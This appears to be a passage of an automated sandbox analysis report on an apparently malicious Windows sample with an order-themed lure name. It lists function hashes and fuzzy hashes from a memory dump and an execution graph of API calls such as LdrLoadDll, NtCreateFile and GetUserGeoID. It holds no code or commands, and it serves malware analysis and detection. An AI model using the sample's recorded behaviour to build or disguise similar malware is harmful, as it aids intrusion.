                                                                        Function 00007FF816400A12 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ZrFt$jtFt
                                                                        • API String ID: 0-2583774646
                                                                        • Opcode ID: 33878a0224900cc1515e734402bbe1185ce931c62cffa9ce2c152796ba4993e7
                                                                        • Instruction ID: 4251fb6f08365d657f371e146a6b27da8a4288b5c68973f9cfca316cf1759e08
                                                                        • Opcode Fuzzy Hash: 33878a0224900cc1515e734402bbe1185ce931c62cffa9ce2c152796ba4993e7
                                                                        • Instruction Fuzzy Hash: 1C51A07090DB898FD7859BB89C293E87FE0FB56720F1401FED045DB292DBA81855CB21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF81640451F Relevance: 1.3, Strings: 1, Instructions: 2COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: }
                                                                        • API String ID: 0-4239843852
                                                                        • Opcode ID: e650026573bdfeb66af98b5bd25dd5670134d598558dd9dacc325add84e1d85c
                                                                        • Instruction ID: 486ad00b62a2b8e230771c7a543f363de02acd37a931d43f7aab0a2ef17944d3
                                                                        • Opcode Fuzzy Hash: e650026573bdfeb66af98b5bd25dd5670134d598558dd9dacc325add84e1d85c
                                                                        • Instruction Fuzzy Hash: 11A00260C0D9A68AE7245A00C9183ACA6706F40759F1002A6804D50480C67C35989D1A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816400590 Relevance: .1, Instructions: 139COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bcde7df24f64ecd27a071cfe479f67a1ab2b4e428bf302de6631d41951acc4f0
                                                                        • Instruction ID: 38f8baa34f413f85c21db96141f3e44168e8b2b3a309cc3e199645e71ce920b1
                                                                        • Opcode Fuzzy Hash: bcde7df24f64ecd27a071cfe479f67a1ab2b4e428bf302de6631d41951acc4f0
                                                                        • Instruction Fuzzy Hash: AA41B270A18A5D8FDB94EFACC859AED7BF0FF58320F40027AD449E7255CA345886CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF8164003E8 Relevance: .1, Instructions: 128COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34adaba803273c551fc637f1d01e1e394f29294b8c94ca9485232c6c8277eb95
                                                                        • Instruction ID: a118508e74859a025329dbcf46c616b8f4c8ecb4e450c912dd1d750c8851f942
                                                                        • Opcode Fuzzy Hash: 34adaba803273c551fc637f1d01e1e394f29294b8c94ca9485232c6c8277eb95
                                                                        • Instruction Fuzzy Hash: B241B232D1895D8BEB94EB68D4457FDB7B1FF59350F40427AE00DE7292DE3868A18740
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816400078 Relevance: .1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e7e651623daf565880bae66d5fd98b4c42db279d19cb9ddb600efb116c3cafdc
                                                                        • Instruction ID: 470013b3687dcac04f28e1b18b66fd0da2947088aa232a63e97a26aafef846b2
                                                                        • Opcode Fuzzy Hash: e7e651623daf565880bae66d5fd98b4c42db279d19cb9ddb600efb116c3cafdc
                                                                        • Instruction Fuzzy Hash: 2611B73581C6C98FDB45EF28A8956F93BA0FF55754B0801BAE488C7093DA24E455C785
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816402C80 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ac712f5ad1cd0cc314e7a4c16990f11ac6b7f19319c2dff55d7378a76312be87
                                                                        • Instruction ID: 0583f46363472c9d06c45500f86401a12c1569a8652f21dab4d8666da4f53b7e
                                                                        • Opcode Fuzzy Hash: ac712f5ad1cd0cc314e7a4c16990f11ac6b7f19319c2dff55d7378a76312be87
                                                                        • Instruction Fuzzy Hash: 8821677591891C8FCF98EB14C8A5BE9B7F1FB68305F1015AA900EE3261DB75AA81CF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816408C48 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 266c2c78f4a16a0436f5c594059f473cb64a984582304c8cf0f19c27f05b8601
                                                                        • Instruction ID: 498c0a56c5dc453ebdc35e4e8522442d14a94631e583cad64b61cbbfe2fb8275
                                                                        • Opcode Fuzzy Hash: 266c2c78f4a16a0436f5c594059f473cb64a984582304c8cf0f19c27f05b8601
                                                                        • Instruction Fuzzy Hash: DC21C27090892D8EEFA8EB00CC947E9B3B1FB54355F1002EAC04EA3291DE786AD4CF04
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816400825 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5c64deb08695a6bc670cccc374f30cd61dc7c24da7ccb76b0315ac8f91fb5a1d
                                                                        • Instruction ID: ecbe06e5f4c6d1adccf74bb028ebdb9f20b3294d023d750fc024e73a88bbbf51
                                                                        • Opcode Fuzzy Hash: 5c64deb08695a6bc670cccc374f30cd61dc7c24da7ccb76b0315ac8f91fb5a1d
                                                                        • Instruction Fuzzy Hash: 8B01FE27B4C95587E311766DEC961EC3F10EFC1771F0902B7D1C456082D914615BC7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF81640567E Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b42ceccac47249009b35b982b70aae0fe48cc5e2aec810fb8abe6d1d14fc9f93
                                                                        • Instruction ID: 2c8b491b4abf41758552c855e6bca44607f007cda7cd194106d20b887c6955cb
                                                                        • Opcode Fuzzy Hash: b42ceccac47249009b35b982b70aae0fe48cc5e2aec810fb8abe6d1d14fc9f93
                                                                        • Instruction Fuzzy Hash: 84111C70D099698EEBA0EB18C8887E9B3F0EB54761F1002E6D40CE7695DB386AD5CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816400830 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 224339246277abfda05f9abf9b0d18f2a936df4bfc90b7c23704c79716bee297
                                                                        • Instruction ID: 5defea6183d0f236f484e69423cf4f5877d9dc6ec430f2bc6b7287c2b0f698ba
                                                                        • Opcode Fuzzy Hash: 224339246277abfda05f9abf9b0d18f2a936df4bfc90b7c23704c79716bee297
                                                                        • Instruction Fuzzy Hash: 2CF0FC27A4C96987E311766CBC4A1E83F10EFC1771F4902B6D1C8560D3DE14616AC691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF8164000B8 Relevance: .0, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7be9e84daad811717cbe3161d997fc3649b52b83b23b498d0f7f74b06df2bba0
                                                                        • Instruction ID: 9e2ff82c526aeea3af29a948295ced5a3a233074b00b6dfd099129ac08a99bb7
                                                                        • Opcode Fuzzy Hash: 7be9e84daad811717cbe3161d997fc3649b52b83b23b498d0f7f74b06df2bba0
                                                                        • Instruction Fuzzy Hash: 16F0E734564A4D8FCB84EF18D885AE937E0FF68759F010265B89DD3250CB34F560CB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816400840 Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8dc40b77dd82f61046b785e282102a54688d775cb2c751e2210d105e677d67dc
                                                                        • Instruction ID: c8a41fe23315124fb440f430abea8cb7b74eead5ea7eed5a553b9f5bdb1f51d0
                                                                        • Opcode Fuzzy Hash: 8dc40b77dd82f61046b785e282102a54688d775cb2c751e2210d105e677d67dc
                                                                        • Instruction Fuzzy Hash: FAF0A727D4C99986E7517A28BC492F83F10FF81BB1F490276E1CC550D3DE18A569C691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816400140 Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da139f2042d4ade02851b6dedfc00a37cd39086deebc148048b26720c9a86bf1
                                                                        • Instruction ID: e2c13f24828e5eea53b8350fb7b1de8f9608ffff4cd53d91a1d3521a7d6f7a83
                                                                        • Opcode Fuzzy Hash: da139f2042d4ade02851b6dedfc00a37cd39086deebc148048b26720c9a86bf1
                                                                        • Instruction Fuzzy Hash: 37F03934814A4D9FEB80EF68C8497EE7BF0FF68351F50057AE81CD2190DA34A6A4CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816408C3D Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 25a90cef2235204c947ad10a431cf0cbf755b22c5ff0455d083df255adacbe8a
                                                                        • Instruction ID: ddcbbaef597befcc0d1c0eafaffa14d0cfba35aea1ec1fc8a7961f6a64c95c61
                                                                        • Opcode Fuzzy Hash: 25a90cef2235204c947ad10a431cf0cbf755b22c5ff0455d083df255adacbe8a
                                                                        • Instruction Fuzzy Hash: 1FF0ECB0C199698EEBA4DB14C9507F877B6AF54750F1006FAC18DA2192DA781AD4CF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816400848 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a8b5f546b40c50b151920e830248120e712605152925f5cabfc27568ec18a75e
                                                                        • Instruction ID: b03e183672d376cafe01dc6e8aa0cf608188e70031c4ed31cdc2d508eecef86d
                                                                        • Opcode Fuzzy Hash: a8b5f546b40c50b151920e830248120e712605152925f5cabfc27568ec18a75e
                                                                        • Instruction Fuzzy Hash: 44E02223C4C99986E7617628280D2F83E00FF02BB0F480275E0CC140E3DE08A4B8C681
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816406A22 Relevance: .0, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3d47538bf0ad09ca5fdb6617efdf05115bc40edab0368b32df5c45e3f16347b3
                                                                        • Instruction ID: 06d093d7bdc26383ab49fcfea4e02c67ff7f78e40d6ea0ec74c754e10c13eaae
                                                                        • Opcode Fuzzy Hash: 3d47538bf0ad09ca5fdb6617efdf05115bc40edab0368b32df5c45e3f16347b3
                                                                        • Instruction Fuzzy Hash: BBF05E7080D929CEEB54AF64D8043E9B6A0BF44314F1051B9D18DA72C2DB386995DF05
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816408F0C Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 022bac1ad004dbc958f447862290a58846948f6c9c7ec77ee21889b0d0afda54
                                                                        • Instruction ID: 3a3bea6ec846bef2c66205dfc08040d14dd57233a0ffd02a1cc80f812b47e844
                                                                        • Opcode Fuzzy Hash: 022bac1ad004dbc958f447862290a58846948f6c9c7ec77ee21889b0d0afda54
                                                                        • Instruction Fuzzy Hash: 6ED09EB0C195798DFF74DA10C6503FC72727F50751F1106BBC18D66182CA782AD49E44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FF816408F12 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.319691883.00007FF816400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff816400000_Requisito de pedido #23022300.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aafc17a4e0205d97cd8bc0be4932488716499d0241b0e197816fa607dcbfe149
                                                                        • Instruction ID: 3a3bea6ec846bef2c66205dfc08040d14dd57233a0ffd02a1cc80f812b47e844
                                                                        • Opcode Fuzzy Hash: aafc17a4e0205d97cd8bc0be4932488716499d0241b0e197816fa607dcbfe149
                                                                        • Instruction Fuzzy Hash: 6ED09EB0C195798DFF74DA10C6503FC72727F50751F1106BBC18D66182CA782AD49E44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:3.7%
                                                                        Dynamic/Decrypted Code Coverage:2.5%
                                                                        Signature Coverage:3.9%
                                                                        Total number of Nodes:644
                                                                        Total number of Limit Nodes:84
                                                                        execution_graph 33831 420113 33834 41e7d3 33831->33834 33839 41f223 33834->33839 33836 41e7ef 33843 13f9a00 LdrInitializeThunk 33836->33843 33837 41e80a 33840 41f232 33839->33840 33842 41f2a8 33839->33842 33840->33842 33844 4195b3 33840->33844 33842->33836 33843->33837 33845 4195c1 33844->33845 33846 4195cd 33844->33846 33845->33846 33849 419a33 LdrLoadDll 33845->33849 33846->33842 33848 41971f 33848->33842 33849->33848 33850 40b493 33851 40b4b8 33850->33851 33856 40ced3 33851->33856 33855 40b510 33857 40cef7 33856->33857 33858 40cf33 LdrLoadDll 33857->33858 33859 40b4eb 33857->33859 33858->33859 33859->33855 33860 40ea93 33859->33860 33861 40eabf 33860->33861 33871 41e433 33861->33871 33864 40eadf 33864->33855 33868 40eb1a 33880 41e6e3 33868->33880 33870 40eb3d 33870->33855 33872 41f223 LdrLoadDll 33871->33872 33873 40ead8 33872->33873 33873->33864 33874 41e473 33873->33874 33875 41f223 LdrLoadDll 33874->33875 33876 41e48f 33875->33876 33883 13f9710 LdrInitializeThunk 33876->33883 33877 40eb02 33877->33864 33879 41ea63 LdrLoadDll 33877->33879 33879->33868 33881 41e6ff NtClose 33880->33881 33882 41f223 LdrLoadDll 33880->33882 33881->33870 33882->33881 33883->33877 33884 401646 33885 40170c 33884->33885 33889 4233f8 33885->33889 33894 423403 33885->33894 33886 401783 33890 423404 33889->33890 33891 423459 33889->33891 33897 41fc53 33890->33897 33891->33886 33895 42340e 33894->33895 33896 41fc53 22 API calls 33894->33896 33895->33886 33896->33895 33898 41fc79 33897->33898 33911 40be63 33898->33911 33900 41fc85 33910 41fce9 33900->33910 33919 410093 33900->33919 33902 41fca4 33903 41fcb7 33902->33903 33931 410053 33902->33931 33906 41fccc 33903->33906 33940 41e903 33903->33940 33936 4034e3 33906->33936 33908 41fcdb 33909 41e903 2 API calls 33908->33909 33909->33910 33910->33886 33943 40bdb3 33911->33943 33913 40be70 33914 40be77 33913->33914 33955 40bd53 33913->33955 33914->33900 33920 4100bf 33919->33920 34349 40d3a3 33920->34349 33922 4100d1 34353 40ff63 33922->34353 33925 410104 33928 410115 33925->33928 33930 41e6e3 2 API calls 33925->33930 33926 4100ec 33927 4100f7 33926->33927 33929 41e6e3 2 API calls 33926->33929 33927->33902 33928->33902 33929->33927 33930->33928 33932 4195b3 LdrLoadDll 33931->33932 33933 410072 33932->33933 33934 410079 33933->33934 33935 41007b GetUserGeoID 33933->33935 33934->33903 33935->33903 33937 40353a 33936->33937 33939 403547 33937->33939 34373 40dd33 33937->34373 33939->33908 33941 41e922 ExitProcess 33940->33941 33942 41f223 LdrLoadDll 33940->33942 33942->33941 33944 40bdc6 33943->33944 33994 41ce83 LdrLoadDll 33943->33994 33974 41cd43 33944->33974 33947 40bdd9 33947->33913 33948 40bdcf 33948->33947 33977 41f5a3 33948->33977 33950 40be16 33950->33947 33988 40bbf3 33950->33988 33952 40be36 33995 40b653 LdrLoadDll 33952->33995 33954 40be48 33954->33913 33956 40bd70 33955->33956 33957 41f893 LdrLoadDll 33955->33957 34331 41f893 33956->34331 33957->33956 33960 41f893 LdrLoadDll 33961 40bd9d 33960->33961 33962 40fe53 33961->33962 33963 40fe6c 33962->33963 34335 40d223 33963->34335 33965 40fe7f 33966 41e433 LdrLoadDll 33965->33966 33967 40fe8e 33966->33967 33968 40be88 33967->33968 34339 41ea23 33967->34339 33968->33900 33970 40fea5 33971 40fed0 33970->33971 34342 41e4b3 33970->34342 33973 41e6e3 2 API calls 33971->33973 33973->33968 33975 41cd58 33974->33975 33996 41e853 LdrLoadDll 33974->33996 33975->33948 33978 41f5bc 33977->33978 33997 4191a3 33978->33997 33980 41f5d4 33981 41f5dd 33980->33981 34036 41f3e3 33980->34036 33981->33950 33983 41f5f1 33983->33981 34053 41e153 33983->34053 33985 41f625 34058 420153 33985->34058 34309 4093e3 33988->34309 33990 40bc14 33990->33952 33991 40bc0d 33991->33990 34322 4096a3 33991->34322 33994->33944 33995->33954 33996->33975 33998 4194e6 33997->33998 34000 4191b7 33997->34000 33998->33980 34000->33998 34061 41dea3 34000->34061 34002 4192e8 34064 41e5b3 34002->34064 34003 4192cb 34121 41e6b3 LdrLoadDll 34003->34121 34006 41930f 34008 420153 2 API calls 34006->34008 34007 4192d5 34007->33980 34011 41931b 34008->34011 34009 4194aa 34012 41e6e3 2 API calls 34009->34012 34010 4194c0 34127 418ec3 LdrLoadDll NtReadFile NtClose 34010->34127 34011->34007 34011->34009 34011->34010 34016 4193b3 34011->34016 34013 4194b1 34012->34013 34013->33980 34015 4194d3 34015->33980 34017 41941a 34016->34017 34018 4193c2 34016->34018 34017->34009 34019 41942d 34017->34019 34020 4193c7 34018->34020 34021 4193db 34018->34021 34123 41e533 34019->34123 34122 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34020->34122 34025 4193e0 34021->34025 34026 4193f8 34021->34026 34067 418e23 34025->34067 34026->34013 34079 418b43 34026->34079 34028 4193d1 34028->33980 34030 41948d 34033 41e6e3 2 API calls 34030->34033 34031 4193ee 34031->33980 34035 419499 34033->34035 34034 419410 34034->33980 34035->33980 34038 41f3fe 34036->34038 34037 41f410 34037->33983 34038->34037 34145 4200d3 34038->34145 34040 41f430 34148 4187a3 34040->34148 34042 41f453 34042->34037 34043 4187a3 3 API calls 34042->34043 34045 41f475 34043->34045 34045->34037 34180 419b03 34045->34180 34046 41f4fd 34047 41f50d 34046->34047 34275 41f1a3 LdrLoadDll 34046->34275 34191 41f013 34047->34191 34050 41f53b 34270 41e113 34050->34270 34052 41f565 34052->33983 34054 41e16f 34053->34054 34055 41f223 LdrLoadDll 34053->34055 34303 13f967a 34054->34303 34055->34054 34056 41e18a 34056->33985 34306 41e8c3 34058->34306 34060 41f64f 34060->33950 34062 41f223 LdrLoadDll 34061->34062 34063 41929c 34062->34063 34063->34002 34063->34003 34063->34007 34065 41f223 LdrLoadDll 34064->34065 34066 41e5cf NtCreateFile 34065->34066 34066->34006 34068 418e3f 34067->34068 34069 41e533 LdrLoadDll 34068->34069 34070 418e60 34069->34070 34071 418e67 34070->34071 34072 418e7b 34070->34072 34073 41e6e3 2 API calls 34071->34073 34074 41e6e3 2 API calls 34072->34074 34075 418e70 34073->34075 34076 418e84 34074->34076 34075->34031 34128 420273 LdrLoadDll RtlAllocateHeap 34076->34128 34078 418e8f 34078->34031 34080 418bc1 34079->34080 34081 418b8e 34079->34081 34083 418d09 34080->34083 34087 418bdd 34080->34087 34082 41e533 LdrLoadDll 34081->34082 34084 418ba9 34082->34084 34085 41e533 LdrLoadDll 34083->34085 34086 41e6e3 2 API calls 34084->34086 34091 418d24 34085->34091 34088 418bb2 34086->34088 34089 41e533 LdrLoadDll 34087->34089 34088->34034 34090 418bf8 34089->34090 34093 418c14 34090->34093 34094 418bff 34090->34094 34141 41e573 LdrLoadDll 34091->34141 34097 418c19 34093->34097 34098 418c2f 34093->34098 34096 41e6e3 2 API calls 34094->34096 34095 418d5e 34099 41e6e3 2 API calls 34095->34099 34100 418c08 34096->34100 34101 41e6e3 2 API calls 34097->34101 34107 418c34 34098->34107 34129 420233 34098->34129 34104 418d69 34099->34104 34100->34034 34102 418c22 34101->34102 34102->34034 34103 418c43 34103->34034 34104->34034 34107->34103 34132 41e663 34107->34132 34108 418c97 34112 418cae 34108->34112 34140 41e4f3 LdrLoadDll 34108->34140 34109 418cb5 34113 41e6e3 2 API calls 34109->34113 34110 418cca 34114 41e6e3 2 API calls 34110->34114 34112->34109 34112->34110 34113->34103 34115 418cd3 34114->34115 34116 418cff 34115->34116 34135 41ff53 34115->34135 34116->34034 34118 418cea 34119 420153 2 API calls 34118->34119 34120 418cf3 34119->34120 34120->34034 34121->34007 34122->34028 34124 419475 34123->34124 34125 41f223 LdrLoadDll 34123->34125 34126 41e573 LdrLoadDll 34124->34126 34125->34124 34126->34030 34127->34015 34128->34078 34131 42024b 34129->34131 34142 41e883 34129->34142 34131->34107 34133 41e67f NtReadFile 34132->34133 34134 41f223 LdrLoadDll 34132->34134 34133->34108 34134->34133 34136 41ff60 34135->34136 34137 41ff77 34135->34137 34136->34137 34138 420233 2 API calls 34136->34138 34137->34118 34139 41ff8e 34138->34139 34139->34118 34140->34112 34141->34095 34143 41f223 LdrLoadDll 34142->34143 34144 41e89f RtlAllocateHeap 34143->34144 34144->34131 34276 41e793 34145->34276 34147 420100 34147->34040 34149 4187b4 34148->34149 34151 4187bc 34148->34151 34149->34042 34150 418a8f 34150->34042 34151->34150 34279 4212d3 34151->34279 34153 418810 34154 4212d3 2 API calls 34153->34154 34157 41881b 34154->34157 34155 418869 34158 4212d3 2 API calls 34155->34158 34157->34155 34159 421403 3 API calls 34157->34159 34290 421373 LdrLoadDll RtlAllocateHeap RtlFreeHeap 34157->34290 34161 41887d 34158->34161 34159->34157 34160 4188da 34162 4212d3 2 API calls 34160->34162 34161->34160 34284 421403 34161->34284 34164 4188f0 34162->34164 34165 41892d 34164->34165 34168 421403 3 API calls 34164->34168 34166 4212d3 2 API calls 34165->34166 34167 418938 34166->34167 34169 421403 3 API calls 34167->34169 34176 418972 34167->34176 34168->34164 34169->34167 34171 418a67 34292 421333 LdrLoadDll RtlFreeHeap 34171->34292 34173 418a71 34293 421333 LdrLoadDll RtlFreeHeap 34173->34293 34175 418a7b 34294 421333 LdrLoadDll RtlFreeHeap 34175->34294 34291 421333 LdrLoadDll RtlFreeHeap 34176->34291 34178 418a85 34295 421333 LdrLoadDll RtlFreeHeap 34178->34295 34181 419b14 34180->34181 34182 4191a3 8 API calls 34181->34182 34187 419b2a 34182->34187 34183 419b33 34183->34046 34184 419b6a 34185 420153 2 API calls 34184->34185 34186 419b7b 34185->34186 34186->34046 34187->34183 34187->34184 34188 419bb6 34187->34188 34189 420153 2 API calls 34188->34189 34190 419bbb 34189->34190 34190->34046 34192 41f027 34191->34192 34193 41eea3 LdrLoadDll 34191->34193 34296 41eea3 34192->34296 34193->34192 34195 41f030 34196 41eea3 LdrLoadDll 34195->34196 34197 41f039 34196->34197 34198 41eea3 LdrLoadDll 34197->34198 34199 41f042 34198->34199 34200 41eea3 LdrLoadDll 34199->34200 34201 41f04b 34200->34201 34202 41eea3 LdrLoadDll 34201->34202 34203 41f054 34202->34203 34204 41eea3 LdrLoadDll 34203->34204 34205 41f060 34204->34205 34206 41eea3 LdrLoadDll 34205->34206 34207 41f069 34206->34207 34208 41eea3 LdrLoadDll 34207->34208 34209 41f072 34208->34209 34210 41eea3 LdrLoadDll 34209->34210 34211 41f07b 34210->34211 34212 41eea3 LdrLoadDll 34211->34212 34213 41f084 34212->34213 34214 41eea3 LdrLoadDll 34213->34214 